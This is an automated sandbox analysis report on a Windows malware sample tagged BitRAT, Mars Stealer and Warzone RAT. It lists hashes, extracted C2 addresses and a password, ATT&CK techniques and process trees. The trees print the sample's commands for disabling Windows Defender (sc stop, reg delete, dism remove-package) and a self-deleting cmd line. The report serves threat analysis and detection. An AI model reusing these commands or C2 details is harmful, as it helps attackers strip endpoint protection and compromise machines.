bitrat | 83b8c34a7c66b407be941e59a9ce7a84ee81a8dfad3cea67e86118e96221c749

Analysis

max time kernel
134s
max time network
153s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
20-11-2022 16:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

592bef1e0325ada505ec4875d5727bc1.exe
Size

2.1MB
MD5

592bef1e0325ada505ec4875d5727bc1
SHA1

d6c6aa187d2b5aaff512c12948a426584382e92c
SHA256

83b8c34a7c66b407be941e59a9ce7a84ee81a8dfad3cea67e86118e96221c749
SHA512

38410a737b63a6cf123b08b74e836e75189ce6dae8d4491b4deab5791eff29a824be24d3d70a53ccaf3137222d79253385be5180fffc1e98a0a9c11b1b1e8d3e
SSDEEP

49152:tBUOgQLgF1CiOBInpLNAZpCY3iEO+IVG5r:nU7CCtOmFNAP6O

Score

10^/10

bitrat marsstealer warzonerat default discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

warzonerat

45.139.105.147:5200

Extracted

Family

marsstealer

Botnet

Default

data.topababa.com/gate.php

Extracted

Family

bitrat

Version

1.38

45.139.105.147:1234

Attributes

communication_password
81dc9bdb52d04dc20036dbd8313ed055
install_dir
temp
install_file
svchost
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
Mars Stealer
An infostealer written in C++ based on other infostealers.
stealer marsstealer

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters	reg.exe

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Warzone RAT payload 5 IoCs

rat

Processes:

resource	yara_rule
\Program Files\Microsoft.exe	warzonerat
\Program Files\Microsoft.exe	warzonerat
\Program Files\Microsoft.exe	warzonerat
C:\Program Files\Microsoft.exe	warzonerat
\Program Files\Microsoft.exe	warzonerat

Executes dropped EXE 12 IoCs

Processes:

Microsoft.exeBuilded.exeinstallerX32.exeInstallerX64.exeMicrosoft office.exedismhost.exedismhost.exedismhost.exedismhost.exedismhost.exedismhost.exedismhost.exe

pid	process
276	Microsoft.exe
284	Builded.exe
1936	installerX32.exe
464	InstallerX64.exe
1952	Microsoft office.exe
840	dismhost.exe
1960	dismhost.exe
2044	dismhost.exe
772	dismhost.exe
1568	dismhost.exe
1544	dismhost.exe
1492	dismhost.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 64 IoCs

Processes:

592bef1e0325ada505ec4875d5727bc1.exeDism.exedismhost.exeDism.exedismhost.exe

pid	process
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1468	592bef1e0325ada505ec4875d5727bc1.exe
1736	Dism.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
840	dismhost.exe
1652	Dism.exe
1960	dismhost.exe
1960	dismhost.exe
1960	dismhost.exe
1960	dismhost.exe
1960	dismhost.exe
1960	dismhost.exe
1960	dismhost.exe
1960	dismhost.exe
1960	dismhost.exe
1960	dismhost.exe
1960	dismhost.exe
1960	dismhost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Microsoft office.exeMicrosoft.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost"	Microsoft office.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program Files\\Microsoft.exe"	Microsoft.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

Microsoft office.exe

pid process

1952 Microsoft office.exe
1952 Microsoft office.exe
1952 Microsoft office.exe
1952 Microsoft office.exe
1952 Microsoft office.exe

pid	process
1952	Microsoft office.exe
1952	Microsoft office.exe
1952	Microsoft office.exe
1952	Microsoft office.exe
1952	Microsoft office.exe

Drops file in Program Files directory 64 IoCs

Processes:

cmd.exe592bef1e0325ada505ec4875d5727bc1.exeBuilded.exe

description	ioc	process
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpRes.dll	cmd.exe
File opened for modification	C:\Program Files\InstallerX64.exe	592bef1e0325ada505ec4875d5727bc1.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File created	C:\Program Files\5F3OHLFU	Builded.exe
File opened for modification	C:\Program Files\7QQ1N79Z	Builded.exe
File created	C:\Program Files\__tmp_rar_sfx_access_check_7080588	592bef1e0325ada505ec4875d5727bc1.exe
File created	C:\Program Files\installerX32.exe	592bef1e0325ada505ec4875d5727bc1.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files\Microsoft.exe	592bef1e0325ada505ec4875d5727bc1.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MsMpLics.dll	cmd.exe
File created	C:\Program Files\LN7YMY5F	Builded.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files\7QQ1N79Z	Builded.exe
File opened for modification	C:\Program Files\Builded.exe	592bef1e0325ada505ec4875d5727bc1.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpRTP.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpCom.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files\Builded.exe	592bef1e0325ada505ec4875d5727bc1.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpClient.dll	cmd.exe
File created	C:\Program Files\8G4OP8G4	Builded.exe
File opened for modification	C:\Program Files\Windows Defender\MSASCui.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpLics.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\LN7YMY5F	Builded.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpCmdRun.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpCommu.dll	cmd.exe
File created	C:\Program Files\Microsoft office.exe	592bef1e0325ada505ec4875d5727bc1.exe
File opened for modification	C:\Program Files\Windows Defender\MpEvMsg.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File created	C:\Program Files\InstallerX64.exe	592bef1e0325ada505ec4875d5727bc1.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpOAV.dll	cmd.exe
File opened for modification	C:\Program Files\Microsoft.exe	592bef1e0325ada505ec4875d5727bc1.exe
File opened for modification	C:\Program Files\Windows Defender\MpClient.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpSvc.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\installerX32.exe	592bef1e0325ada505ec4875d5727bc1.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\8G4OP8G4	Builded.exe
File opened for modification	C:\Program Files\Microsoft office.exe	592bef1e0325ada505ec4875d5727bc1.exe
File opened for modification	C:\Program Files\Windows Defender\MpAsDesc.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpAsDesc.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\5F3OHLFU	Builded.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe

Drops file in Windows directory 14 IoCs

Processes:

dismhost.exeDism.exedismhost.exedismhost.exedismhost.exeDism.exedismhost.exeDism.exeDism.exeDism.exeDism.exedismhost.exeDism.exedismhost.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Launches sc.exe 50 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1112	sc.exe
112	sc.exe
728	sc.exe
520	sc.exe
112	sc.exe
1104	sc.exe
568	sc.exe
1324	sc.exe
572	sc.exe
1888	sc.exe
332	sc.exe
1012	sc.exe
584	sc.exe
320	sc.exe
1944	sc.exe
1064	sc.exe
1516	sc.exe
1312	sc.exe
1708	sc.exe
2004	sc.exe
1972	sc.exe
1028	sc.exe
592	sc.exe
1688	sc.exe
1444	sc.exe
1228	sc.exe
436	sc.exe
1176	sc.exe
1348	sc.exe
1040	sc.exe
1028	sc.exe
1852	sc.exe
2040	sc.exe
1848	sc.exe
1416	sc.exe
1916	sc.exe
1628	sc.exe
1460	sc.exe
456	sc.exe
568	sc.exe
560	sc.exe
1136	sc.exe
1244	sc.exe
1252	sc.exe
1476	sc.exe
1628	sc.exe
2044	sc.exe
868	sc.exe
1680	sc.exe
1648	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Builded.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Builded.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Builded.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

912 timeout.exe

pid	process
912	timeout.exe

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1856	taskkill.exe
1680	taskkill.exe
1624	taskkill.exe
1848	taskkill.exe
1484	taskkill.exe
1916	taskkill.exe
1904	taskkill.exe
1096	taskkill.exe
2016	taskkill.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 26 IoCs

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exesc.exereg.exereg.exereg.exereg.exesc.exesc.exesc.exetaskkill.exesc.exesc.exesc.exereg.exesc.exesc.exesc.exesc.exe

pid	process
1976	reg.exe
1176	reg.exe
556	reg.exe
1720	reg.exe
992	reg.exe
1892	reg.exe
728	reg.exe
1312	reg.exe
1768	reg.exe
1688	sc.exe
1376	reg.exe
1388	reg.exe
1476	reg.exe
672	reg.exe
1040	sc.exe
1460	sc.exe
456	sc.exe
1904	taskkill.exe
520	sc.exe
1252	sc.exe
568	sc.exe
1624	reg.exe
1324	sc.exe
1516	sc.exe
1680	sc.exe
1848	sc.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exereg.exetaskkill.exesc.exetaskkill.exereg.exeMicrosoft office.exesc.exeDism.exeDism.exeDism.exeDism.exeDism.exeDism.exe

description	pid	process
Token: SeDebugPrivilege	1096	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	1916	taskkill.exe
Token: SeDebugPrivilege	2016	reg.exe
Token: SeDebugPrivilege	1856	taskkill.exe
Token: SeDebugPrivilege	1680	sc.exe
Token: SeDebugPrivilege	1904	taskkill.exe
Token: SeDebugPrivilege	1624	reg.exe
Token: SeDebugPrivilege	1952	Microsoft office.exe
Token: SeShutdownPrivilege	1952	Microsoft office.exe
Token: SeDebugPrivilege	1848	sc.exe
Token: SeBackupPrivilege	1736	Dism.exe
Token: SeRestorePrivilege	1736	Dism.exe
Token: SeBackupPrivilege	1652	Dism.exe
Token: SeRestorePrivilege	1652	Dism.exe
Token: SeBackupPrivilege	1820	Dism.exe
Token: SeRestorePrivilege	1820	Dism.exe
Token: SeBackupPrivilege	1276	Dism.exe
Token: SeRestorePrivilege	1276	Dism.exe
Token: SeBackupPrivilege	1676	Dism.exe
Token: SeRestorePrivilege	1676	Dism.exe
Token: SeBackupPrivilege	2000	Dism.exe
Token: SeRestorePrivilege	2000	Dism.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Microsoft office.exe

pid process

1952 Microsoft office.exe
1952 Microsoft office.exe

pid	process
1952	Microsoft office.exe
1952	Microsoft office.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

592bef1e0325ada505ec4875d5727bc1.exeinstallerX32.execmd.exeInstallerX64.execmd.execmd.exe

description	pid	process	target process
PID 1468 wrote to memory of 276	1468	592bef1e0325ada505ec4875d5727bc1.exe	Microsoft.exe
PID 1468 wrote to memory of 276	1468	592bef1e0325ada505ec4875d5727bc1.exe	Microsoft.exe
PID 1468 wrote to memory of 276	1468	592bef1e0325ada505ec4875d5727bc1.exe	Microsoft.exe
PID 1468 wrote to memory of 276	1468	592bef1e0325ada505ec4875d5727bc1.exe	Microsoft.exe
PID 1468 wrote to memory of 284	1468	592bef1e0325ada505ec4875d5727bc1.exe	Builded.exe
PID 1468 wrote to memory of 284	1468	592bef1e0325ada505ec4875d5727bc1.exe	Builded.exe
PID 1468 wrote to memory of 284	1468	592bef1e0325ada505ec4875d5727bc1.exe	Builded.exe
PID 1468 wrote to memory of 284	1468	592bef1e0325ada505ec4875d5727bc1.exe	Builded.exe
PID 1468 wrote to memory of 1936	1468	592bef1e0325ada505ec4875d5727bc1.exe	installerX32.exe
PID 1468 wrote to memory of 1936	1468	592bef1e0325ada505ec4875d5727bc1.exe	installerX32.exe
PID 1468 wrote to memory of 1936	1468	592bef1e0325ada505ec4875d5727bc1.exe	installerX32.exe
PID 1468 wrote to memory of 1936	1468	592bef1e0325ada505ec4875d5727bc1.exe	installerX32.exe
PID 1468 wrote to memory of 1936	1468	592bef1e0325ada505ec4875d5727bc1.exe	installerX32.exe
PID 1468 wrote to memory of 1936	1468	592bef1e0325ada505ec4875d5727bc1.exe	installerX32.exe
PID 1468 wrote to memory of 1936	1468	592bef1e0325ada505ec4875d5727bc1.exe	installerX32.exe
PID 1468 wrote to memory of 464	1468	592bef1e0325ada505ec4875d5727bc1.exe	InstallerX64.exe
PID 1468 wrote to memory of 464	1468	592bef1e0325ada505ec4875d5727bc1.exe	InstallerX64.exe
PID 1468 wrote to memory of 464	1468	592bef1e0325ada505ec4875d5727bc1.exe	InstallerX64.exe
PID 1468 wrote to memory of 464	1468	592bef1e0325ada505ec4875d5727bc1.exe	InstallerX64.exe
PID 1468 wrote to memory of 464	1468	592bef1e0325ada505ec4875d5727bc1.exe	InstallerX64.exe
PID 1468 wrote to memory of 464	1468	592bef1e0325ada505ec4875d5727bc1.exe	InstallerX64.exe
PID 1468 wrote to memory of 464	1468	592bef1e0325ada505ec4875d5727bc1.exe	InstallerX64.exe
PID 1936 wrote to memory of 1164	1936	installerX32.exe	cmd.exe
PID 1936 wrote to memory of 1164	1936	installerX32.exe	cmd.exe
PID 1936 wrote to memory of 1164	1936	installerX32.exe	cmd.exe
PID 1936 wrote to memory of 1164	1936	installerX32.exe	cmd.exe
PID 1468 wrote to memory of 1952	1468	592bef1e0325ada505ec4875d5727bc1.exe	Microsoft office.exe
PID 1468 wrote to memory of 1952	1468	592bef1e0325ada505ec4875d5727bc1.exe	Microsoft office.exe
PID 1468 wrote to memory of 1952	1468	592bef1e0325ada505ec4875d5727bc1.exe	Microsoft office.exe
PID 1468 wrote to memory of 1952	1468	592bef1e0325ada505ec4875d5727bc1.exe	Microsoft office.exe
PID 1164 wrote to memory of 1228	1164	cmd.exe	reg.exe
PID 1164 wrote to memory of 1228	1164	cmd.exe	reg.exe
PID 1164 wrote to memory of 1228	1164	cmd.exe	reg.exe
PID 464 wrote to memory of 932	464	InstallerX64.exe	cmd.exe
PID 464 wrote to memory of 932	464	InstallerX64.exe	cmd.exe
PID 464 wrote to memory of 932	464	InstallerX64.exe	cmd.exe
PID 464 wrote to memory of 932	464	InstallerX64.exe	cmd.exe
PID 1164 wrote to memory of 1944	1164	cmd.exe	sc.exe
PID 1164 wrote to memory of 1944	1164	cmd.exe	sc.exe
PID 1164 wrote to memory of 1944	1164	cmd.exe	sc.exe
PID 932 wrote to memory of 1888	932	cmd.exe	sc.exe
PID 932 wrote to memory of 1888	932	cmd.exe	sc.exe
PID 932 wrote to memory of 1888	932	cmd.exe	sc.exe
PID 932 wrote to memory of 2000	932	cmd.exe	cmd.exe
PID 932 wrote to memory of 2000	932	cmd.exe	cmd.exe
PID 932 wrote to memory of 2000	932	cmd.exe	cmd.exe
PID 1164 wrote to memory of 436	1164	cmd.exe	sc.exe
PID 1164 wrote to memory of 436	1164	cmd.exe	sc.exe
PID 1164 wrote to memory of 436	1164	cmd.exe	sc.exe
PID 2000 wrote to memory of 1144	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 1144	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 1144	2000	cmd.exe	reg.exe
PID 1164 wrote to memory of 2044	1164	cmd.exe	sc.exe
PID 1164 wrote to memory of 2044	1164	cmd.exe	sc.exe
PID 1164 wrote to memory of 2044	1164	cmd.exe	sc.exe
PID 932 wrote to memory of 2016	932	cmd.exe	reg.exe
PID 932 wrote to memory of 2016	932	cmd.exe	reg.exe
PID 932 wrote to memory of 2016	932	cmd.exe	reg.exe
PID 932 wrote to memory of 1060	932	cmd.exe	reg.exe
PID 932 wrote to memory of 1060	932	cmd.exe	reg.exe
PID 932 wrote to memory of 1060	932	cmd.exe	reg.exe
PID 1164 wrote to memory of 1972	1164	cmd.exe	sc.exe
PID 1164 wrote to memory of 1972	1164	cmd.exe	sc.exe
PID 1164 wrote to memory of 1972	1164	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\592bef1e0325ada505ec4875d5727bc1.exe
"C:\Users\Admin\AppData\Local\Temp\592bef1e0325ada505ec4875d5727bc1.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1468

C:\Program Files\Microsoft.exe
"C:\Program Files\Microsoft.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
3⤵
PID:1120

C:\Program Files\Microsoft office.exe
"C:\Program Files\Microsoft office.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1952

C:\Program Files\InstallerX64.exe
"C:\Program Files\InstallerX64.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:464

C:\Program Files\installerX32.exe
"C:\Program Files\installerX32.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1936

C:\Program Files\Builded.exe
"C:\Program Files\Builded.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Checks processor information in registry
PID:284

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Program Files\Builded.exe" & exit
3⤵
PID:1492

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
4⤵
- Delays execution with timeout.exe
PID:912

C:\Windows\system32\sc.exe
sc stop windefend
1⤵
- Launches sc.exe
PID:1228

C:\Windows\system32\sc.exe
sc config windefend start= disabled
1⤵
- Launches sc.exe
PID:1944

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C41.tmp\C52.tmp\C53.bat "C:\Program Files\InstallerX64.exe""
1⤵
- Suspicious use of WriteProcessMemory
PID:932

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
2⤵
PID:1888

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI__neutral_neutral_cw5n1h2txyewy" /f
2⤵
PID:2016

C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:1960

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
2⤵
PID:1608

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~\Owners" /f
2⤵
PID:1748

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
2⤵
PID:836

C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~ /NoRestart
2⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~\Owners" /f
2⤵
PID:1960

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1624

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
2⤵
PID:804

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~\Owners" /f
2⤵
PID:1832

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~\Owners" /f
2⤵
PID:1228

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~\Owners" /f
2⤵
PID:592

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
2⤵
PID:1160

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~\Owners" /f
2⤵
PID:296

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~\Owners" /f
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:672

C:\Windows\system32\reg.exe
